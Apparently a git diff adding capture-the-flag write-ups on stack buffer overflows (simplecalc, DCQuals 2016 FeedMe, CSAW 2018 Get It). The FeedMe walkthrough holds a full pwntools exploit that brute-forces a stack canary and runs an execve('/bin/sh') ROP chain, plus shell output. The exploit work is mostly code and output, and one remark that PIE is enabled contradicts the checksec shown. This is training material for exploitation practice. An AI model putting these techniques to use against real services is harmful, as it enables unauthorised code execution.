+ add(0x0)
+ add(popRdx)
+ add(0x0)
+
+ add(syscall) # Syscall instruction
+
+
+
+We specify the syscall ID into rax, the first arguement (/bin/sh) into rdi, and then both rsi and rdx (2nd and 3rd arguements) contain nullbytes. And lastly we make the syscall to end our ropchain.
+
+
+ target.sendline('5') # Save and exit to execute memcpy and trigger buffer overflow
+
+ # Drop to an interactive shell to use our new shell
+ target.interactive()
+
+
+
+At last, once we finished feeding the ropchain into the binary, we get to the memcpy call to trigger it and then drop into an interactive shell:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/calc]
+ → python3 exploit.py
+ [+] Starting local process './simplecalc': pid 3475833
+ [*] Switching to interactive mode
+ Result for x + y is 0.
+
+ Options Menu:
+ [1] Addition.
+ [2] Subtraction.
+ [3] Multiplication.
+ [4] Division.
+ [5] Save and Exit.
+ => $ id
+ uid=1000(nothing) gid=1000(nothing) groups=1000(nothing),90(network),98(power),972(libvirt),988(storage),990(optical),995(audio),998(wheel)
+ $ cat flag.txt
+ flag{g0ttem_b0yz}
+
+
+
+And that's it! We have been able to print spawn a shell and print out the contents of the flag.
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
diff --git a/2/feed.md b/2/feed.md
new file mode 100644
index 0000000..b4604fb
--- /dev/null
+++ b/2/feed.md
@@ -0,0 +1,688 @@
+# DCQuals 2016 FeedMe
+
+Yet another insane challenge, buckle up !
+
+## Downloading the binary file
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/feed]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/07-bof_static/dcquals16_feedme/feedme
+ --2021-03-06 11:21:19-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/07-bof_static/dcquals16_feedme/feedme
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving github.com (github.com)... 140.82.121.4
+ Connecting to github.com (github.com)|140.82.121.4|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/07-bof_static/dcquals16_feedme/feedme [following]
+ --2021-03-06 11:21:20-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/07-bof_static/dcquals16_feedme/feedme
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.108.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 664792 (649K) [application/octet-stream]
+ Saving to: ‘feedme’
+
+ feedme 100%[=======================================================================================================================================================>] 649.21K --.-KB/s in 0.1s
+
+ 2021-03-06 11:21:20 (5.42 MB/s) - ‘feedme’ saved [664792/664792]
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/feed]
+ → file feedme
+ feedme: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.24, stripped
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/feed]
+ → chmod +x feedme
+
+
+
+` ![]()
+
+## Solution
+
+First let's run the binary to see what it does after using pwn checksec on it:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/feed]
+ → pwn checksec feedme
+ [*] '/home/nothing/binexp/2/feed/feedme'
+ Arch: i386-32-little
+ RELRO: No RELRO
+ Stack: No canary found
+ NX: NX enabled
+ PIE: No PIE (0x8048000)
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/feed]
+ → ./feedme
+ FEED ME!
+ yes
+ no
+ yes
+ no
+ yes
+ no
+ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
+ ^C
+
+
+
+Here we see that we are dealing with a 32bit statically linked binary, with a non executable stack (NX). When we run it, the program prompts us with some text before we can give some input, it seems to be able to take in a certain amount of input, so let's see how much:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/feed]
+ → ./feedme
+ FEED ME!
+ 000000000000000000000000000000000
+ 000000000000000000000000000000000
+ ATE 30303030303030303030303030303030...
+ *** stack smashing detected ***: ./feedme terminated
+ Child exit.
+ FEED ME!
+
+
+
+Apparently we are able to overwrite a stack canary, so we probably have a stack buffer overflow somewhere. In addition to that, when it detected that the stack canary was overwritten, it terminated the process and kept asking for more input. The binary is probably designed in such a way that it spawns child processes which is where we scan in the input and overwrite the stack canary. When the program sees tha tthe stack canary got edited, it terminates the child process, and the parent process spawns another instance and continues asking us for input. So let's take a look at the binary inside of ghidra:
+
+
+
+Once again, the main function is not called 'main' so we find it by searching for the text that the binary outputs, (CTRL+SHIFT+E) and we find the following:
+
+
+ uint FUN_08049036(void)
+
+ {
+ byte bVar1;
+ undefined4 uVar2;
+ uint uVar3;
+ int in_GS_OFFSET;
+ undefined local_30 [32];
+ int local_10;
+
+ local_10 = *(int *)(in_GS_OFFSET + 0x14);
+ FUN_0804fc60("FEED ME!");
+ bVar1 = FUN_08048e42();
+ FUN_08048e7e(local_30,bVar1);
+ uVar2 = FUN_08048f6e(local_30,bVar1,0x10);
+ FUN_0804f700("ATE %s\n",uVar2);
+ uVar3 = (uint)bVar1;
+ if (local_10 != *(int *)(in_GS_OFFSET + 0x14)) {
+ uVar3 = FUN_0806f5b0();
+ }
+ return uVar3;
+ }
+
+
+
+Here we see that much like our previous challenge, there aren't any scanf nor any gets first off, our input text (most probably **local_32** which can hold 32 bytes) gets passed into the **FUN_08048f6e** function along with the value returned by the **FUN_08048e42()** function and the hex value **0x10**.
+
+We also see that the function**FUN_08048f6e(local_30,bVar1,0x10);** takes in our input value as well as a limit of 16 (0x10) bytes of input, that function returns a pointer to 16 bytes of our input, so let's look at it from gdb:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/feed]
+ → gdb ./feedme
+ GNU gdb (GDB) 10.1
+ Copyright (C) 2020 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-pc-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1 using Python engine 3.9
+ Reading symbols from ./feedme...
+ (No debugging symbols found in ./feedme)
+ gef➤ set follow-fork-mode child
+ gef➤ show follow-fork mode
+ Debugger response to a program call of fork or vfork is "child".
+
+
+
+Now here we basically set gdb so that it follows the forks created by the binary file, now we need breakpoints:
+
+
+
+Now we know where we want our 3 breakpoints:
+
+
+ 1) 0x8049053
+ 2) 0x8049069
+ 3) 0x8049069
+
+
+
+So we continue with gdb:
+
+
+ gef➤ set follow-fork-mode child
+ gef➤ show follow-fork mode
+ Debugger response to a program call of fork or vfork is "child".
+ gef➤ b *0x8049053
+ Breakpoint 1 at 0x8049053
+ gef➤ b *0x8049069
+ Breakpoint 2 at 0x8049069
+ gef➤ b *0x8049084
+ Breakpoint 3 at 0x8049084
+ gef➤ r
+ Starting program: /home/nothing/binexp/2/feed/feedme
+ [Attaching after process 3458879 fork to child process 3458883]
+ [New inferior 2 (process 3458883)]
+ [Detaching after fork from parent process 3458879]
+ [Inferior 1 (process 3458879) detached]
+ FEED ME!
+ [Switching to process 3458883]
+
+ Thread 2.1 "feedme" hit Breakpoint 1, 0x08049053 in ?? ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $eax : 0x9
+ $ebx : 0x080481a8 → push ebx
+ $ecx : 0x080eb4d4 → 0x00000000
+ $edx : 0x9
+ $esp : 0xffffd080 → 0x080be70c → "FEED ME!"
+ $ebp : 0xffffd0c8 → 0xffffd0f8 → 0xffffd118 → 0x08049970 → push ebx
+ $esi : 0x0
+ $edi : 0x080ea00c → 0x08067f90 → mov edx, DWORD PTR [esp+0x4]
+ $eip : 0x08049053 → 0xfffdeae8 → 0x00000000
+ $eflags: [zero carry PARITY adjust SIGN trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0xffffd080│+0x0000: 0x080be70c → "FEED ME!" ← $esp
+ 0xffffd084│+0x0004: 0x00000000
+ 0xffffd088│+0x0008: 0x00000000
+ 0xffffd08c│+0x000c: 0x0806ccb7 → sub esp, 0x20
+ 0xffffd090│+0x0010: 0x080ea200 → 0xfbad2887
+ 0xffffd094│+0x0014: 0x080ea247 → 0x0eb4d40a
+ 0xffffd098│+0x0018: 0x080ea248 → 0x080eb4d4 → 0x00000000
+ 0xffffd09c│+0x001c: 0x00000000
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
+ 0x8049041 add BYTE PTR [ecx-0x3fce0bbb], cl
+ 0x8049047 mov DWORD PTR [esp], 0x80be70c
+ 0x804904e call 0x804fc60
+ ●→ 0x8049053 call 0x8048e42
+ ↳ 0x8048e42 push ebp
+ 0x8048e43 mov ebp, esp
+ 0x8048e45 sub esp, 0x28
+ 0x8048e48 mov DWORD PTR [esp+0x8], 0x1
+ 0x8048e50 lea eax, [ebp-0xd]
+ 0x8048e53 mov DWORD PTR [esp+0x4], eax
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────── arguments (guessed) ────
+ 0x8048e42 (
+ )
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "feedme", stopped 0x8049053 in ?? (), reason: BREAKPOINT
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x8049053 → call 0x8048e42
+ [#1] 0x80490dc → movzx eax, al
+ [#2] 0x80491da → mov eax, 0x0
+ [#3] 0x80493ba → mov DWORD PTR [esp], eax
+ [#4] 0x8048d2b → hlt
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤
+
+
+
+After a bit of gdb wizardry that i don't even understand, we arrive at this:
+
+
+ gef➤ x/4w $esp
+ 0xffffd080: 0xffffd09c 0x31 0x10 0x806ccb7
+
+ gef➤ x/50w 0xffffd09c
+ 0xffffd09c: 0x77322f78 0x73652420 0xa0a0a70 0xa0a0a0a
+ 0xffffd0ac: 0xa0a0a0a 0x6e69660a 0xa687369 0x300a300a
+ 0xffffd0bc: 0x30303030 0x30303030 0x30303030 0x30303030
+ 0xffffd0cc: 0x8049030 0x80ea0a0 0x0 0x80ed840
+ 0xffffd0dc: 0x804f8b4 0x0 0x0 0x0
+ 0xffffd0ec: 0x80481a8 0x80481a8 0x0 0xffffd118
+ 0xffffd0fc: 0x80491da 0x80ea0a0 0x0 0x2
+ 0xffffd10c: 0x0 0x0 0x80ea00c 0x8049970
+ 0xffffd11c: 0x80493ba 0x1 0xffffd1a4 0xffffd1ac
+ 0xffffd12c: 0x0 0x0 0x80481a8 0x0
+ 0xffffd13c: 0x80ea00c 0x8049970 0x488454cd 0xbe00e522
+ 0xffffd14c: 0x0 0x0 0x0 0x0
+ 0xffffd15c: 0x0 0x0
+
+ gef➤ info frame
+ Stack level 0, frame at 0xffffd0d0:
+ eip = 0x8049084; saved eip = 0x8049030
+ called by frame at 0x30303038
+ Arglist at 0xffffd0c8, args:
+ Locals at 0xffffd0c8, Previous frame's sp is 0xffffd0d0
+ Saved registers:
+ ebp at 0xffffd0c8, eip at 0xffffd0cc
+
+
+
+The start of our input is being scanned at **0xffffd09c** and the return address is at **0xffffd0cc** , Somehow you have to find that the stack canary is some random hex value, at some memory address because it's 4 bytes of random values with the last value being a nullbyte. and that there is a 0x20 byte offset to the stack canary and :
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/1 ] [binexp/2/feed]
+ → python3
+ Python 3.9.2 (default, Feb 20 2021, 18:40:11)
+ [GCC 10.2.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+
+ >>> hex( 0xffffd0cc - 0xffffd09c )
+ '0x30'
+
+
+
+Now we know that there is a 0x30 bytes offset to the return address. Both the 0x30 and the 0x20 offset are within the reach of our buffer overflow Lastly we need to know where the feed function is called:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/feed]
+ → gdb ./feedme
+ GNU gdb (GDB) 10.1
+ Copyright (C) 2020 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-pc-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1 using Python engine 3.9
+ Reading symbols from ./feedme...
+ (No debugging symbols found in ./feedme)
+ gef➤ b *0x8049053
+ Breakpoint 1 at 0x8049053
+ gef➤ r
+ Starting program: /home/nothing/binexp/2/feed/feedme
+ [Detaching after fork from child process 3730383]
+ FEED ME!
+ ^C
+ Program received signal SIGINT, Interrupt.
+ 0xf7ffc549 in __kernel_vsyscall ()
+ ~/.gef-54e93efd89ec59e5d178fbbeda1fed890098d18d.py:2425: DeprecationWarning: invalid escape sequence '\$'
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $eax : 0xfffffe00
+ $ebx : 0x38ebcf
+ $ecx : 0xffffd0e0 → 0x00000000
+ $edx : 0x0
+ $esp : 0xffffd0b8 → 0xffffd0f8 → 0xffffd118 → 0x08049970 → push ebx
+ $ebp : 0xffffd0f8 → 0xffffd118 → 0x08049970 → push ebx
+ $esi : 0x0
+ $edi : 0x080ea00c → 0x08067f90 → mov edx, DWORD PTR [esp+0x4]
+ $eip : 0xf7ffc549 → <__kernel_vsyscall+9> pop ebp
+ $eflags: [zero carry PARITY adjust SIGN trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0xffffd0b8│+0x0000: 0xffffd0f8 → 0xffffd118 → 0x08049970 → push ebx ← $esp
+ 0xffffd0bc│+0x0004: 0x00000000
+ 0xffffd0c0│+0x0008: 0xffffd0e0 → 0x00000000
+ 0xffffd0c4│+0x000c: 0x0806cc02 → pop ebx
+ 0xffffd0c8│+0x0010: 0x080481a8 → push ebx
+ 0xffffd0cc│+0x0014: 0x0804910e → mov DWORD PTR [ebp-0xc], eax
+ 0xffffd0d0│+0x0018: 0x0038ebcf
+ 0xffffd0d4│+0x001c: 0xffffd0e0 → 0x00000000
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
+ 0xf7ffc543 <__kernel_vsyscall+3> mov ebp, esp
+ 0xf7ffc545 <__kernel_vsyscall+5> sysenter
+ 0xf7ffc547 <__kernel_vsyscall+7> int 0x80
+ → 0xf7ffc549 <__kernel_vsyscall+9> pop ebp
+ 0xf7ffc54a <__kernel_vsyscall+10> pop edx
+ 0xf7ffc54b <__kernel_vsyscall+11> pop ecx
+ 0xf7ffc54c <__kernel_vsyscall+12> ret
+ 0xf7ffc54d nop
+ 0xf7ffc54e nop
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "feedme", stopped 0xf7ffc549 in __kernel_vsyscall (), reason: SIGINT
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0xf7ffc549 → __kernel_vsyscall()
+ [#1] 0x806cc02 → pop ebx
+ [#2] 0x804910e → mov DWORD PTR [ebp-0xc], eax
+ [#3] 0x80491da → mov eax, 0x0
+ [#4] 0x80493ba → mov DWORD PTR [esp], eax
+ [#5] 0x8048d2b → hlt
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤ bt
+ #0 0xf7ffc549 in __kernel_vsyscall ()
+ #1 0x0806cc02 in ?? ()
+ #2 0x0804910e in ?? ()
+ #3 0x080491da in ?? ()
+ #4 0x080493ba in ?? ()
+ #5 0x08048d2b in ?? ()
+
+
+
+So here we basically set only the first breakpoint, and hit CTRL+C to exit out of the 'feedme' prompt and then run 'bt' so that we can follow the backtrace to the parent function that we can also find if we look for (CTRL+SHIFT+E) **'Child IO error!'** :
+
+
+
+So we get the following code:
+
+
+ void FUN_080490b0(void)
+
+ {
+ undefined uVar1;
+ int local_1c;
+ uint local_18;
+ int local_14;
+ int local_10;
+
+ local_1c = 0;
+ local_18 = 0;
+ while( true ) {
+ if (799 < local_18) {
+ return;
+ }
+ local_14 = FUN_0806cc70();
+ if (local_14 == 0) break;
+ local_10 = FUN_0806cbe0(local_14,&local;_1c,0);
+ if (local_10 == -1) {
+ FUN_0804fc60("Wait error!");
+ FUN_0804ed20(0xffffffff);
+ }
+ if (local_1c == -1) {
+ FUN_0804fc60("Child IO error!");
+ FUN_0804ed20(0xffffffff);
+ }
+ FUN_0804fc60("Child exit.");
+ FUN_0804fa20(0);
+ local_18 = local_18 + 1;
+ }
+ uVar1 = FUN_08049036();
+ FUN_0804f700("YUM, got %d bytes!\n",uVar1);
+ return;
+ }
+
+
+Here we see that it is calling the function responsible for setting up a child process in a loop that will run for 800 times, that means we can crash a child process 800 times before the program exits on us, So how do we exploit it?
+
+So first, with the stack canary, we have the ability to overwrite the return address. The only thing stopping us other than the NX is the stack canary that we can bruteforce. The problem is that all of the child process will share the same canary. For the canary it will have 4 bytes, one null byte and 3 random bytes, so only 3 bytes that we do not know.
+
+So we can overwrite the stack canary one byte a a time, The byte we overwrite it with will be a wild guess, if one child process dies we know that it was incorrect, and if it doesn't then we will know what our guess was correct. There are 256 different values that the byte can be, and since there are 3 bytes we are guessing that gives us a 256 * 3 = 768 possible guesses every combination if we guess one byte a a time. This can be done by only overwriting one byte at a time. with that we can deal with the stack canary.
+
+Now onto the ROP chain: Once we have the stack canary and nothing will be able to stop us from reaching the return function to get code execution as usual. Then what do we execute ? NX is turned on, so we cannot just jump to the shellcode we place on the stack. However the elf does have PIE set to enabled which randomizes the address of code, Therefore building a ROP chain without an infoleak is possible. For this ROP Chain, we will be making an execve() syscall to /bin/sh to give us a shell.
+
+Now to build our ROP chain we need to look for ROP Gadgets as we saw in the previous 2 challenges. We will use ROPGadget for that, check out [simplecalc](calc.html) to check out how i installed it. now let's find the following gadgets:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/feed]
+ → ROPgadget --binary feedme| grep "mov.*\[eax\].*; ret$"
+
+ [...]
+
+ 0x0807be31 : mov dword ptr [eax], edx ; ret
+
+ [...]
+
+
+
+Here's an useful gadget because this will allow us to move the contents of the edx register into the area of space pointed to by the address of eax, and then return. So if we wanted to write to the address 1234 wec ould load that address into eax and the value we wanted to write into the edx register, then call this gadget.
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/feed]
+ → ROPgadget --binary feedme| grep ": pop eax ; ret$"
+ 0x080bb496 : pop eax ; ret
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/feed]
+ → ROPgadget --binary feedme| grep ": pop edx ; ret$"
+ 0x0806f34a : pop edx ; ret
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/feed]
+ → ROPgadget --binary feedme| grep ": pop ecx ; pop ebx ; ret$"
+ 0x0806f371 : pop ecx ; pop ebx ; ret
+
+
+
+The last gadget we found is so that we can control the value of the ecx register. Unfortunately there are no gadgets that will just pop a value into the ecx and just return, so this is the next best thing, which will save us not having to use another gadget when we pop a value into the ebx register.
+
+Now that we have gadgets for eax, edx, ecx:
+
+
+
+Now we need a gadget for the ebx register because this one will be needed to contain our **/bin/sh** string
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/feed]
+ → ROPgadget --binary feedme| grep "int 0x80$"
+ 0x080941d3 : add bh, al ; inc ebp ; test byte ptr [ecx], dl ; add byte ptr [eax], al ; int 0x80
+ 0x0804975f : add byte ptr [eax], al ; int 0x80
+ 0x0806ceb0 : add byte ptr [eax], al ; mov eax, edi ; mov ecx, 0x81 ; int 0x80
+ 0x0806ceb1 : add byte ptr [ecx + 0x81b9f8], cl ; add byte ptr [eax], al ; int 0x80
+ 0x0806cf3c : add dword ptr [eax], eax ; add byte ptr [eax], al ; int 0x80
+ 0x0806f428 : clc ; mov ecx, 0x80 ; int 0x80
+ 0x0806ceb3 : clc ; mov ecx, 0x81 ; int 0x80
+ 0x080941d5 : inc ebp ; test byte ptr [ecx], dl ; add byte ptr [eax], al ; int 0x80
+
+ **0x08049761 : int 0x80**
+
+
+
+Here we see that at **0x08049761** is a gadget that enables us to make a syscall to the kernel to get a shell. in x86, you can just call int 0x80. Syscall will expect 3 arguments as detailed below:
+
+
+ eax : 11 # SYSCALL ID
+ ebx : bss addr 0x80eb928 # address of the command
+ ecx : 0x0
+ edx : 0x0
+
+
+So now with this we get our ROP Chain:
+
+
+ # This is to write the string '/bin' to the bss address 0x80eb928. Since this is 32 bit, registers can only hold 4 bytes, so we can only write 4 characters at a time
+ payload += p32(0x080bb496) # pop eax ; ret
+ payload += p32(0x80eb928) # bss address
+ payload += p32(0x0806f34a) # pop edx
+ payload += p32(0x6e69622f) # /bin string in hex, in little endian
+ payload += p32(0x0807be31) # mov dword ptr [eax], edx ; ret
+
+ # Write the second half of the string '/bin/sh' the '/sh' to 0x80eb928 + 0x4
+ payload += p32(0x080bb496) # pop eax ; ret
+ payload += p32(0x80eb928 + 0x4) # bss address + 0x4 to write after '/bin'
+ payload += p32(0x0806f34a) # pop edx
+ payload += p32(0x0068732f) # /sh string in hex, in little endian
+ payload += p32(0x0807be31) # mov dword ptr [eax], edx ; ret
+
+ # Now that we have the string '/bin/sh' written to 0x80eb928, we can load the appropriate values into the eax, ecx, edx, and ebx registers and make the syscall.
+ payload += p32(0x080bb496) # pop eax ; ret
+ payload += p32(0xb) # 11
+ payload += p32(0x0806f371) # pop ecx ; pop ebx ; ret
+ payload += p32(0x0) # 0x0
+ payload += p32(0x80eb928) # bss address
+ payload += p32(0x0806f34a) # pop edx ; ret
+ payload += p32(0x0) # 0x0
+ payload += p32(0x8049761) # syscall
+
+
+
+And we get our full exploit here:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/feed]
+ → vim exploit.py
+
+
+
+
+ # This is based off of a Raytheon SI Govs talk
+
+ # First we import pwntools
+ from pwn import *
+
+ # Here is the function to brute force the canary
+ def breakCanary():
+ # We know that the first byte of the stack canary has to be \x00 since it is null terminated, keep the values we know for the canary in known_canary
+ known_canary = "\x00"
+ # Ascii representation of the canary
+ hex_canary = "00"
+ # The current canary which will be incremented
+ canary = 0x0
+ # The number of bytes we will give as input
+ inp_bytes = 0x22
+ # Iterate 3 times for the three bytes we need to brute force
+ for j in range(0, 3):
+ # Iterate up to 0xff times to brute force all posible values for byte
+ for i in xrange(0xff):
+ log.info("Trying canary: " + hex(canary) + hex_canary)
+
+ # Send the current input size
+ target.send(p32(inp_bytes)[0])
+
+ # Send this iterations canary
+ target.send("0"*0x20 + known_canary + p32(canary)[0])
+
+ # Scan in the output, determine if we have a correct value
+ output = target.recvuntil("exit.")
+ if "YUM" in output:
+ # If we have a correct value, record the canary value, reset the canary value, and move on
+ print "next byte is: " + hex(canary)
+ known_canary = known_canary + p32(canary)[0]
+ inp_bytes = inp_bytes + 1
+ new_canary = hex(canary)
+ new_canary = new_canary.replace("0x", "")
+ hex_canary = new_canary + hex_canary
+ canary = 0x0
+ break
+ else:
+ # If this isn't the canary value, increment canary by one and move onto next loop
+ canary = canary + 0x1
+
+ # Return the canary
+ return int(hex_canary, 16)
+
+ # Start the target process
+ target = process('./feedme')
+ #gdb.attach(target)
+
+ # Brute force the canary
+ canary = breakCanary()
+ log.info("The canary is: " + hex(canary))
+
+
+ # Now that we have the canary, we can start making our final payload
+
+ # This will cover the space up to, and including the canary
+ payload = "0"*0x20 + p32(canary)
+
+ # This will cover the rest of the space between the canary and the return address
+ payload += "1"*0xc
+
+ # Start putting together the ROP Chain
+
+ # This is to write the string '/bin' to the bss address 0x80eb928. Since this is 32 bit, registers can only hold 4 bytes, so we can only write 4 characters at a time
+ payload += p32(0x080bb496) # pop eax ; ret
+ payload += p32(0x80eb928) # bss address
+ payload += p32(0x0806f34a) # pop edx
+ payload += p32(0x6e69622f) # /bin string in hex, in little endian
+ payload += p32(0x0807be31) # mov dword ptr [eax], edx ; ret
+
+ # Write the second half of the string '/bin/sh' the '/sh' to 0x80eb928 + 0x4
+ payload += p32(0x080bb496) # pop eax ; ret
+ payload += p32(0x80eb928 + 0x4) # bss address + 0x4 to write after '/bin'
+ payload += p32(0x0806f34a) # pop edx
+ payload += p32(0x0068732f) # /sh string in hex, in little endian
+ payload += p32(0x0807be31) # mov dword ptr [eax], edx ; ret
+
+ # Now that we have the string '/bin/sh' written to 0x80eb928, we can load the appropriate values into the eax, ecx, edx, and ebx registers and make the syscall.
+ payload += p32(0x080bb496) # pop eax ; ret
+ payload += p32(0xb) # 11
+ payload += p32(0x0806f371) # pop ecx ; pop ebx ; ret
+ payload += p32(0x0) # 0x0
+ payload += p32(0x80eb928) # bss address
+ payload += p32(0x0806f34a) # pop edx ; ret
+ payload += p32(0x0) # 0x0
+ payload += p32(0x8049761) # syscall
+
+ # Send the amount of bytes for our payload, and the payload itself
+ target.send("\x78")
+ target.send(payload)
+
+ # Drop to an interactive shell
+ target.interactive()
+
+
+
+Now let's see if it works:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/feed]
+ → python2 exploit.py
+ [+] Starting local process './feedme': pid 208854
+ [*] Trying canary: 0x000
+ [*] Trying canary: 0x100
+ [*] Trying canary: 0x200
+ [*] Trying canary: 0x300
+ [*] Trying canary: 0x400
+ [*] Trying canary: 0x500
+ [*] Trying canary: 0x600
+ [*] Trying canary: 0x700
+ [*] Trying canary: 0x800
+ [*] Trying canary: 0x900
+ [*] Trying canary: 0xa00
+ [*] Trying canary: 0xb00
+ [*] Trying canary: 0xc00
+ [*] Trying canary: 0xd00
+ [*] Trying canary: 0xe00
+ [*] Trying canary: 0xf00
+
+ [...]
+
+ [*] Trying canary: 0x7d5cc000
+ [*] Trying canary: 0x7e5cc000
+ [*] Trying canary: 0x7f5cc000
+ [*] Trying canary: 0x805cc000
+ [*] Trying canary: 0x815cc000
+ [*] Trying canary: 0x825cc000
+ [*] Trying canary: 0x835cc000
+ [*] Trying canary: 0x845cc000
+ [*] Trying canary: 0x855cc000
+ [*] Trying canary: 0x865cc000
+ [*] Trying canary: 0x875cc000
+ [*] Trying canary: 0x885cc000
+ [*] Trying canary: 0x895cc000
+ [*] Trying canary: 0x8a5cc000
+ [*] Trying canary: 0x8b5cc000
+ [*] Trying canary: 0x8c5cc000
+ [*] Trying canary: 0x8d5cc000
+ next byte is: 0x8d
+ [*] The canary is: 0x8d5cc000
+ [*] Switching to interactive mode
+
+ FEED ME!
+ ATE 30303030303030303030303030303030...
+ $ id
+ uid=1000(nothing) gid=1000(nothing) groups=1000(nothing),90(network),98(power),972(libvirt),988(storage),990(optical),995(audio),998(wheel)
+ $ cat flag.txt
+ flag{g0ttem_b0yz}
+ $ exit
+
+
+
+And that's it ! We have been able to spawn a shell and print the flag.
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
diff --git a/2/get.md b/2/get.md
new file mode 100644
index 0000000..299227e
--- /dev/null
+++ b/2/get.md
@@ -0,0 +1,309 @@
+# CSAW 2018 Get It
+
+## Downloading the binary file
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/2 ] [binexp/2/getit]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/05-bof_callfunction/csaw18_getit/get_it
+ --2021-02-27 14:55:14-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/05-bof_callfunction/csaw18_getit/get_it
+ Resolving github.com (github.com)... 140.82.121.3
+ Connecting to github.com (github.com)|140.82.121.3|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/05-bof_callfunction/csaw18_getit/get_it [following]
+ --2021-02-27 14:55:15-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/05-bof_callfunction/csaw18_getit/get_it
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.109.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 8744 (8.5K) [application/octet-stream]
+ Saving to: ‘get_it’
+
+ get_it 100%[=======================================================================================================================================================================================================>] 8.54K --.-KB/s in 0s
+
+ 2021-02-27 14:55:15 (36.0 MB/s) - ‘get_it’ saved [8744/8744]
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/2 ] [binexp/2/getit]
+ → file get_it
